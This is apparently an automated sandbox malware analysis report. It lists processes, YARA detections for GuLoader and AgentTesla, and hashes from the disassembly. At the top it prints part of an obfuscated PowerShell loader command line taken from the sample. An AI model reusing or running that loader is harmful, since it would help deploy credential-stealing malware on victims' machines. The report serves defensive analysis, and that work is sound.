'Unobe$DinargRaglalTriceoJunc,b Rutiajustil Gnat: SyndZ ov roBushbcPropiaBon ml PartoBagfl=Nonp $Id.algBly alWeedeoDimitb Pre,aSporrlcos.a:DecimKJsandoBorgerChemot For l AfrigPisannLifoiiP skenMus.tg DiskePanterPo,yd+Con.u+Legi.%Behng$ CacoF hamad Sworr Fal,eSvumnn Bh.leGratuhBoligjV.inyewic,omBrand.,etincAsymmo .estu Pa lnExtentpropa ') ;$unshady=$Fdrenehjem[$Zocalo];}Saprophagan (Pisseskn 'Bolig$KjesegProevlGa,blo B.rdbPauseaStudilKenni:BramsLRegule adedn Clare.edrat Kugl Nymaa=Su.pr In,oGSpecteMela,t Ammi-AnskaCacumeoKrigsnJingstPref,ePyobanKonfetExha, Tids$ GaviSBl wttAkadea BranrKolpotBillehsk teu Per,l UntulAl,oceWa err dgif ');Saprophagan (Pisseskn 'Syr.b$sideogPondwlAposeoP,rspbUnex aSiro,lBacil:EbraiURea.tn Coa,iHelseogebyrn CirciP.seksBlasetReereeOrdner RejssAt ac Slags=Repat Borge[hoptoS Wroky rgumsParentGavekeMo.abmFlje..Pr.acC PerioremsenSurf.v BereeUgr,irBlaartPreop]Imbo : Sidd:UnemoFF,scir bil oParacmUns.oBBa,veaSchepsPalmaeAccul6Nejsi4HabilS ,teatPa ser.ntibiAn.lenScantgTutti(Lejeo$afskiLPseudeUnstanForsve roostEngsn)Elekt ');Saprophagan (Pisseskn 'Und.k$re.segtyreslH ratome iabKondeaU brilBumme:Jvn.rSGavebc S.tao amicffiordf Sings judg Ikra=Fan,a Ko po[OutrhS Nondy Posts OccitvinedeReloamHul.i.Fl,niTAquate,arnexAfprvtCafe..Gge.uESkibinA,armcD moroInropdDecori DrninSlinggHniss] Unus: marg:SoignAKrligSF.rsiCs.nspIProduIo.ymp.BrislGB,rgoeEl.stt intrSGar,etCypr.rInactiGen,anStdergForma(Immun$Oed,pUSkinbn,ptagiCohaboDemianTalleichorisAn ist SliceSkomar Pa,tsRe.im) Xant ');Saprophagan (Pisseskn 'Alter$Bacchg Hdrel SpecoAntirb CowpaGimmilLeuco:talleSfejlmuBrandp.ooeyePro orT leviKei.un bebocp ykiuSubcomFortibStikoeUly,knJapactIndre1 Muni6Bryg,3Lejek=Retss$,hiroSu.wagcRefleo EndofO,ercfLootisTeate.IndlusPa tauKredibVaca sFr igtfrkherTweeziAuditn RiflgRetal( He m3 Sy,t1Spik.5 Poly0flout7Cho.d3Nephr,Lidel2uncom7 Ko.p4Proje3Lycop0se.eh)spout ');Saprophagan $Superincumbent163;"
                                                                      Imagebase:0x250000
                                                                      File size:433'152 bytes
                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2591546419.00000000062C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2603130560.0000000008EA0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.2603283847.000000000CA31000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:6
                                                                      Start time:10:11:04
                                                                      Start date:18/04/2024
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Merogastrula.Bes && echo $"
                                                                      Imagebase:0x1c0000
                                                                      File size:236'544 bytes
                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:10
                                                                      Start time:10:11:30
                                                                      Start date:18/04/2024
                                                                      Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                                      Imagebase:0xad0000
                                                                      File size:516'608 bytes
                                                                      MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.3362357592.00000000245A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.3362357592.0000000024551000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.3362357592.0000000024551000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000A.00000002.3346276290.0000000007441000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:moderate
                                                                      Has exited:false

                                                                      General

                                                                      Target ID:12
                                                                      Start time:10:11:58
                                                                      Start date:18/04/2024
                                                                      Path:C:\Users\user\AppData\Roaming\newfile\newfile.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\AppData\Roaming\newfile\newfile.exe"
                                                                      Imagebase:0x380000
                                                                      File size:516'608 bytes
                                                                      MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Antivirus matches:
                                                                      • Detection: 0%, ReversingLabs
                                                                      • Detection: 0%, Virustotal, Browse
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:13
                                                                      Start time:10:11:58
                                                                      Start date:18/04/2024
                                                                      Path:C:\Windows\System32\rundll32.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                      Imagebase:0x7ff63f8a0000
                                                                      File size:71'680 bytes
                                                                      MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:14
                                                                      Start time:10:12:06
                                                                      Start date:18/04/2024
                                                                      Path:C:\Users\user\AppData\Roaming\newfile\newfile.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\AppData\Roaming\newfile\newfile.exe"
                                                                      Imagebase:0x380000
                                                                      File size:516'608 bytes
                                                                      MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      Disassembly

                                                                      Reset < >

                                                                        Executed Functions

                                                                        Function 00007FFD3489B611 Relevance: .4, Instructions: 398COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2929461368.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7ffd34890000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a7aa4bdaa5a37261fb9020faa86aadebdde099e599575892d16d23ed79d31cfc
                                                                        • Instruction ID: dc7a8a0fde6535c0c2cb1d77830a09e0a503c27d6cbcb70955e816cadcec505c
                                                                        • Opcode Fuzzy Hash: a7aa4bdaa5a37261fb9020faa86aadebdde099e599575892d16d23ed79d31cfc
                                                                        • Instruction Fuzzy Hash: F2D16030A18E4D8FEBA8DF28C8957E977D1FF59301F04426EE84DC7295DB78A9409B81
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFD3489C3C1 Relevance: .4, Instructions: 381COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2929461368.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7ffd34890000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0813d58996f42e40d61e6291f4a288962193e0b5c56af4f59f3bfbc3d5a925f5
                                                                        • Instruction ID: e8ec119709e94efb03ab5ae42cd5f065ab33731e8b7f6db414779da80ed71276
                                                                        • Opcode Fuzzy Hash: 0813d58996f42e40d61e6291f4a288962193e0b5c56af4f59f3bfbc3d5a925f5
                                                                        • Instruction Fuzzy Hash: F0D15130A18E4D8FEBA8DF28C8A57E977D1FB59301F14422ED80DC7295DF79A9408B81
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFD3489CAA0 Relevance: .3, Instructions: 274COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2929461368.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7ffd34890000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e18438908527ae49dd7cda33280d24f3d3ee70fd88d714fc98c2ebabb3fce85b
                                                                        • Instruction ID: a41a5178d8b2e58156c71b296f5c393993f9d00d79552921b5f1092b75d9a115
                                                                        • Opcode Fuzzy Hash: e18438908527ae49dd7cda33280d24f3d3ee70fd88d714fc98c2ebabb3fce85b
                                                                        • Instruction Fuzzy Hash: FC812970B1CE494FD798EB5CC4E4AB5BBE1EFA6350B14057DD08AC3296DA26F842C780
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFD34964323 Relevance: .1, Instructions: 71COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2931046775.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7ffd34960000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a90bf195f33d516c1bb234de15521fbb8b42f41c1044b19880ba930024726ad9
                                                                        • Instruction ID: f68b616151d03e395560d0a7432b5c6cf0d501c9eef1177e8322ea9d00301b59
                                                                        • Opcode Fuzzy Hash: a90bf195f33d516c1bb234de15521fbb8b42f41c1044b19880ba930024726ad9
                                                                        • Instruction Fuzzy Hash: F621F632B0DA898FD795DB9C94A49A477E2FF95224B5800B9D51CC7297DD3DEC409700
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFD3496542F Relevance: .1, Instructions: 67COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2931046775.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7ffd34960000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8090dba469f49ae0c00bc482fe6031c8904e2fa1af7f4f43f4af7cc5a9a4d6c5
                                                                        • Instruction ID: 1d15f86307dbebfd5933645cb6829cc6978f11f44647d6e2878c2d9082e56a70
                                                                        • Opcode Fuzzy Hash: 8090dba469f49ae0c00bc482fe6031c8904e2fa1af7f4f43f4af7cc5a9a4d6c5
                                                                        • Instruction Fuzzy Hash: 58112322F1EAA90FE3E1A2A838B51B466D0EF5667575801FBE90CD728BEC1C6C005391
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFD34893945 Relevance: .0, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2929461368.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7ffd34890000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                        • Instruction ID: 241876a0f25de1cf04efdc636e1e615018bbc16f719980464517d69e48099cc2
                                                                        • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                        • Instruction Fuzzy Hash: 8A01677121CB0D4FD744EF4CE451AA5B7E0FB99364F10056DE58AC3651D636E881CB45
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Non-executed Functions

                                                                        Function 00007FFD34893BFB Relevance: .7, Instructions: 675COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2929461368.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7ffd34890000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5a933ad23de1c5f3502867c5593b2a17054fbe343f20093dbf9d11327de6c371
                                                                        • Instruction ID: 3291214c3851b1f6680951af86fe27d94ed28f4e3aa57bfa3298da53eda6b8c5
                                                                        • Opcode Fuzzy Hash: 5a933ad23de1c5f3502867c5593b2a17054fbe343f20093dbf9d11327de6c371
                                                                        • Instruction Fuzzy Hash: AD220636B0CA5A4FDB54EBACD4B15E97BE0FF96325B080177D148CB193DE38A8468790
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFD34896B70 Relevance: .6, Instructions: 550COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2929461368.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7ffd34890000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 82dba53a83b5208049d0a10a3eb56f982521b5ef8d3a5dca6493d5de5ad3285f
                                                                        • Instruction ID: 208f5925459445bf4ade34c1b03bd7cfb696fd94714b8b75a8345c8e9576e4fa
                                                                        • Opcode Fuzzy Hash: 82dba53a83b5208049d0a10a3eb56f982521b5ef8d3a5dca6493d5de5ad3285f
                                                                        • Instruction Fuzzy Hash: B202F531B0CA8A8FEB55DF5CC4B59ED7FE0FF56314F1401BAD549E71A2DA28A8428780
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFD34896715 Relevance: .4, Instructions: 434COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2929461368.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7ffd34890000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 21a83fd1924ccb6d8f1fae3517f02c302f133b331bfa7f29862ffb5789e0e5bf
                                                                        • Instruction ID: d7202e157242f5091c0540b419951942e6125382c5329aeda167f6881eb26117
                                                                        • Opcode Fuzzy Hash: 21a83fd1924ccb6d8f1fae3517f02c302f133b331bfa7f29862ffb5789e0e5bf
                                                                        • Instruction Fuzzy Hash: 89D1D362B0DBC25FE7569B2C58F60E67FE0EF5326470900BBC5C5DB0A3D91C684A9352
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFD34896090 Relevance: .4, Instructions: 423COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2929461368.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7ffd34890000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 16ee434a24a17c22abe8707df60cbb46b9513bd370d49d690bd269d87057747d
                                                                        • Instruction ID: b4535009f2f4958130004da6a532337f97d7f1119cda0a732c6e47984e77cb87
                                                                        • Opcode Fuzzy Hash: 16ee434a24a17c22abe8707df60cbb46b9513bd370d49d690bd269d87057747d
                                                                        • Instruction Fuzzy Hash: 1EC19547B4DAD21BE722577C58F60EA2FA0DF5327470911F7C7D8DA4A3AD0C6807A292
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFD348960FA Relevance: .1, Instructions: 141COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2929461368.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7ffd34890000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7f1ad8977e5663633238bda7991d6b62a6e086782e3c5f42f3adb1eed6b9df9a
                                                                        • Instruction ID: 123e8c9e4096e718840f8f74caa5a830c429c316d735b365b7e484ce5e9abb2f
                                                                        • Opcode Fuzzy Hash: 7f1ad8977e5663633238bda7991d6b62a6e086782e3c5f42f3adb1eed6b9df9a
                                                                        • Instruction Fuzzy Hash: 5F311E4BB4EAD21FE662573D58BA0DA2F90CF9327570901F7CBD4CA4B39D0C1847A292
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Executed Functions

                                                                        Function 04F6F258 Relevance: .3, Instructions: 281COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.2587929854.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_4f60000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b50867442927e7bda4448a82521cf00e23334f350d3a4b676b67c72e76635317
                                                                        • Instruction ID: 5d8ffa0975902e90290f941aab06098791fb52f988a1b78c2e740c52f66be848
                                                                        • Opcode Fuzzy Hash: b50867442927e7bda4448a82521cf00e23334f350d3a4b676b67c72e76635317
                                                                        • Instruction Fuzzy Hash: B9B16E70E00209CFDF14CFA9D8857AEBBF2BF88314F148529D816A7254EB74A842CF95
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04F6FB28 Relevance: .3, Instructions: 266COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.2587929854.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_4f60000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2e5ca986ad8716ac36b651d63cb86c1023ca4b8b2bcc6b1d59001382c9d1e6f5
                                                                        • Instruction ID: cff731dd4f0ec28d6eeb77f0bc0f347bd5cebdb8da1150e099bed33246eff993
                                                                        • Opcode Fuzzy Hash: 2e5ca986ad8716ac36b651d63cb86c1023ca4b8b2bcc6b1d59001382c9d1e6f5
                                                                        • Instruction Fuzzy Hash: 92B17071E00209CFDB14CFA9E89179DBBF2BF88314F148529D816E7294EB74A842CF91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 07DD5C30 Relevance: .8, Instructions: 767COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.2598404025.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_7dd0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 38556162ff9307b42843690cee411fd40eba5f8f08be931f9498186fabad7219
                                                                        • Instruction ID: 08108db24fb6ddeb592781bc22207e65bb5289bc4d67fa9b8f5c45f6e2a84b4f
                                                                        • Opcode Fuzzy Hash: 38556162ff9307b42843690cee411fd40eba5f8f08be931f9498186fabad7219
                                                                        • Instruction Fuzzy Hash: BA6271B0A00215CFDB24DB68C854BAAFBB2AF85754F14C06AD549AF745CB71EC81CF92
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 07DD4D70 Relevance: .7, Instructions: 741COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.2598404025.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_7dd0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5ef1735750fc930b46acb47239f83cf84bdc3b03019d53a4fff61bccaaef92b0
                                                                        • Instruction ID: e1bbeb83722fddd9bb036d3ad0fbde91f5771811589f8ef881c49464fd43ddf1
                                                                        • Opcode Fuzzy Hash: 5ef1735750fc930b46acb47239f83cf84bdc3b03019d53a4fff61bccaaef92b0
                                                                        • Instruction Fuzzy Hash: D8625CB4B00205DFDB54CB98C544EAAFBB2AF85314F24C069E906AF755CB72EC45CB51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 07DDB1DD Relevance: .7, Instructions: 704COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.2598404025.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_7dd0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b0ad10901b0856fb214905d21f14a1af0514e2a9ddd817a761d6d9e90bfe6912
                                                                        • Instruction ID: 0ecc6873827851f2f5932194eaf4e06dbb81a0fab213ea30fd22494fd8e0992e
                                                                        • Opcode Fuzzy Hash: b0ad10901b0856fb214905d21f14a1af0514e2a9ddd817a761d6d9e90bfe6912
                                                                        • Instruction Fuzzy Hash: 2A6241B4A00219DFDB54DB64C854BEEBBB2AF84704F1080E9D9096B781CB75EE81CF95
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 07DD4D53 Relevance: .6, Instructions: 558COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.2598404025.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_7dd0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9462e7e697c52d19a1f2f1b1433f527e49090d26180030ba738dc723c44fd5e4
                                                                        • Instruction ID: 8c776a39580d55408fbca551a8d1463a865b676f33559ee473464fba44b7ef46
                                                                        • Opcode Fuzzy Hash: 9462e7e697c52d19a1f2f1b1433f527e49090d26180030ba738dc723c44fd5e4
                                                                        • Instruction Fuzzy Hash: B2323AB4A00205DFDB54CB98C944EA9FBB2AF89714F25C069E80AAF355CB72EC45CF51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 07DDE108 Relevance: .5, Instructions: 525COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.2598404025.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_7dd0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 44e16f97f39ca28bef3055a1b952d9c6c911a552c576491b38acc333fe65ca31
                                                                        • Instruction ID: b665e4850740519dcd005ba1d2a5998f9456cd6dba1e074de048bdb7ccf0ba42
                                                                        • Opcode Fuzzy Hash: 44e16f97f39ca28bef3055a1b952d9c6c911a552c576491b38acc333fe65ca31
                                                                        • Instruction Fuzzy Hash: 7712D3B1B00206DFDB14CBA8C454AAAFBF2AFC5714F14806AD945AF395DB71DC41CBA2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04F6B760 Relevance: .5, Instructions: 518COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.2587929854.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_4f60000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 43953186e2ce33b9e23abbd70859b8bafff498cc8339109f770326a765123d0c
                                                                        • Instruction ID: 45e23c456ffbf85eab1e2f38e34a2721e286da8adcf09f5e8816c1720f96c09a
                                                                        • Opcode Fuzzy Hash: 43953186e2ce33b9e23abbd70859b8bafff498cc8339109f770326a765123d0c
                                                                        • Instruction Fuzzy Hash: 4E226230B011648FDB29DF64D854AAEB7B2FF89304F1480A9D54AAB351DF35AD82CF91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 07DD0638 Relevance: .5, Instructions: 491COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.2598404025.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_7dd0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a216fc506ef3a748d6545ca66b435e59cdf8260d42e7f987bb6e3843f6a6fb56
                                                                        • Instruction ID: d9e132d30a78fe3ac00f5f252ab4cff1b2d339c4d154e853311535ae42988f7d
                                                                        • Opcode Fuzzy Hash: a216fc506ef3a748d6545ca66b435e59cdf8260d42e7f987bb6e3843f6a6fb56
                                                                        • Instruction Fuzzy Hash: 02F128B1B04356DFDB254BB8D8106BAFBA6EFC2214F18806BD585CB652DB31DC41C7A2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 07DD54E5 Relevance: .5, Instructions: 483COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.2598404025.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_7dd0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5e85c959d8cd8521cbb51f36281a623aded5e7a0f330d49c00412d8959527d07
                                                                        • Instruction ID: 15f686167ea20655c12b3b00e4268501dadb8d5731de58fa01b102dd325cbb27
                                                                        • Opcode Fuzzy Hash: 5e85c959d8cd8521cbb51f36281a623aded5e7a0f330d49c00412d8959527d07
                                                                        • Instruction Fuzzy Hash: 1A1248B4A00205DFDB54CB98C944EA9FBB2AF85714F24C069E906AF355CB72EC46CF51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 07DD4728 Relevance: .5, Instructions: 465COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.2598404025.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_7dd0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 549500f5e231df5f7979fd087abac2bd02c53f267755615b8cf5269babbfe421
                                                                        • Instruction ID: 9261e00665335003bea74fc5d8d64f56f30af8de89f0a9a39dc7333cca5ec581
